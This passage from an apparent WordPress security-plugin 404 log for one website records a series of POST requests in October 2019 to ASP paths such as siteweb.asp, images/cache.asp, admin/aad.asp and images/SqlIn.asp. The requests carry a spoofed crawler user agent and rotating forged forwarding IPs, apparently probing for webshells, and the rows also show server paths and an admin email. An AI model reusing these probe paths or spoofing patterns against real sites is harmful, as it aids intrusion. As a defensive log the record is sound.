(compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"211.165.254.153\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"211.165.254.153\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:33:\"http://bintara.com.my/siteweb.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/siteweb.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XasnGfBciE@oGFkw1scifQAAAQw\";s:12:\"REDIRECT_URL\";s:12:\"/siteweb.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"53995\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:33:\"http://bintara.com.my/siteweb.asp\";s:10:\"SCRIPT_URL\";s:12:\"/siteweb.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XasnGfBciE@oGFkw1scifQAAAQw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571497753.723\";s:12:\"REQUEST_TIME\";s:10:\"1571497753\";}}','notice','2019-10-19 15:09:15','2019-10-19 15:09:14',35263776,37069096,'http://bintara.com.my//siteweb.asp',1,0,'211.165.254.153'),(28397,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"//siteweb.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"821\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"159.226.157.123\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"159.226.157.123\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:33:\"http://bintara.com.my/siteweb.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/siteweb.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XasnFPBciE@oGFkw1scifAAAARY\";s:12:\"REDIRECT_URL\";s:12:\"/siteweb.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"53995\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:33:\"http://bintara.com.my/siteweb.asp\";s:10:\"SCRIPT_URL\";s:12:\"/siteweb.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XasnFPBciE@oGFkw1scifAAAARY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571497748.1501\";s:12:\"REQUEST_TIME\";s:10:\"1571497748\";}}','notice','2019-10-19 15:09:10','2019-10-19 15:09:08',35339088,37140512,'http://bintara.com.my//siteweb.asp',1,0,'159.226.157.123'),(28396,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//images/cache.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"221.239.228.105\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"221.239.228.105\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/images/cache.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/images/cache.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XasnDPBciE@oGFkw1scieQAAAQg\";s:12:\"REDIRECT_URL\";s:17:\"/images/cache.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"53995\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/images/cache.asp\";s:10:\"SCRIPT_URL\";s:17:\"/images/cache.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XasnDPBciE@oGFkw1scieQAAAQg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571497740.1465\";s:12:\"REQUEST_TIME\";s:10:\"1571497740\";}}','notice','2019-10-19 15:09:02','2019-10-19 15:09:00',35269712,37077424,'http://bintara.com.my//images/cache.asp',1,0,'221.239.228.105'),(28395,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//images/cache.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"211.92.183.0\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"211.92.183.0\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/images/cache.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/images/cache.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XasnArdRi@RFkkQCXDBObgAAAFM\";s:12:\"REDIRECT_URL\";s:17:\"/images/cache.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"53349\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/images/cache.asp\";s:10:\"SCRIPT_URL\";s:17:\"/images/cache.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XasnArdRi@RFkkQCXDBObgAAAFM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571497730.1311\";s:12:\"REQUEST_TIME\";s:10:\"1571497730\";}}','notice','2019-10-19 15:08:52','2019-10-19 15:08:50',35335696,37138552,'http://bintara.com.my//images/cache.asp',1,0,'211.92.183.0'),(28394,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"//admin/aad.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"61.29.146.153\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"61.29.146.153\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"http://bintara.com.my/admin/aad.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/admin/aad.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xasm-bdRi@RFkkQCXDBObQAAAE8\";s:12:\"REDIRECT_URL\";s:14:\"/admin/aad.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"53349\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"http://bintara.com.my/admin/aad.asp\";s:10:\"SCRIPT_URL\";s:14:\"/admin/aad.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xasm-bdRi@RFkkQCXDBObQAAAE8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571497725.2094\";s:12:\"REQUEST_TIME\";s:10:\"1571497725\";}}','notice','2019-10-19 15:08:47','2019-10-19 15:08:45',35267344,37072488,'http://bintara.com.my//admin/aad.asp',1,0,'61.29.146.153'),(28393,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"//admin/aad.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"819\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"203.207.150.162\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"203.207.150.162\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"http://bintara.com.my/admin/aad.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/admin/aad.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xasm97dRi@RFkkQCXDBObAAAAEY\";s:12:\"REDIRECT_URL\";s:14:\"/admin/aad.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"53349\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"http://bintara.com.my/admin/aad.asp\";s:10:\"SCRIPT_URL\";s:14:\"/admin/aad.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xasm97dRi@RFkkQCXDBObAAAAEY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571497719.4306\";s:12:\"REQUEST_TIME\";s:10:\"1571497719\";}}','notice','2019-10-19 15:08:41','2019-10-19 15:08:39',35844432,37648912,'http://bintara.com.my//admin/aad.asp',1,0,'203.207.150.162'),(28392,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"//news/meng.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"211.98.117.33\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"211.98.117.33\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"http://bintara.com.my/news/meng.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/news/meng.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xasm5vBciE@oGFkw1scicwAAARI\";s:12:\"REDIRECT_URL\";s:14:\"/news/meng.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"52956\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"http://bintara.com.my/news/meng.asp\";s:10:\"SCRIPT_URL\";s:14:\"/news/meng.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xasm5vBciE@oGFkw1scicwAAARI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571497702.867\";s:12:\"REQUEST_TIME\";s:10:\"1571497702\";}}','notice','2019-10-19 15:08:24','2019-10-19 15:08:23',35266520,37074392,'http://bintara.com.my//news/meng.asp',1,0,'211.98.117.33'),(28391,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//images/SqlIn.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"159.226.165.138\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"159.226.165.138\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/images/SqlIn.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/images/SqlIn.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xasm2QYF48xX3r6hM@l@@gAAAAQ\";s:12:\"REDIRECT_URL\";s:17:\"/images/SqlIn.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"52142\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/images/SqlIn.asp\";s:10:\"SCRIPT_URL\";s:17:\"/images/SqlIn.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xasm2QYF48xX3r6hM@l@@gAAAAQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571497689.4221\";s:12:\"REQUEST_TIME\";s:10:\"1571497689\";}}','notice','2019-10-19 15:08:11','2019-10-19 15:08:09',35269712,37077424,'http://bintara.com.my//images/SqlIn.asp',1,0,'159.226.165.138'),(28390,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//images/SqlIn.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"125.254.145.178\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"125.254.145.178\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/images/SqlIn.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/images/SqlIn.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xasm0QYF48xX3r6hM@l@9AAAAAw\";s:12:\"REDIRECT_URL\";s:17:\"/images/SqlIn.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"52142\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/images/SqlIn.asp\";s:10:\"SCRIPT_URL\";s:17:\"/images/SqlIn.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xasm0QYF48xX3r6hM@l@9AAAAAw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571497681.3378\";s:12:\"REQUEST_TIME\";s:10:\"1571497681\";}}','notice','2019-10-19 15:08:04','2019-10-19 15:08:01',35335000,37136800,'http://bintara.com.my//images/SqlIn.asp',1,0,'125.254.145.178'),(28389,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//images/index.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; 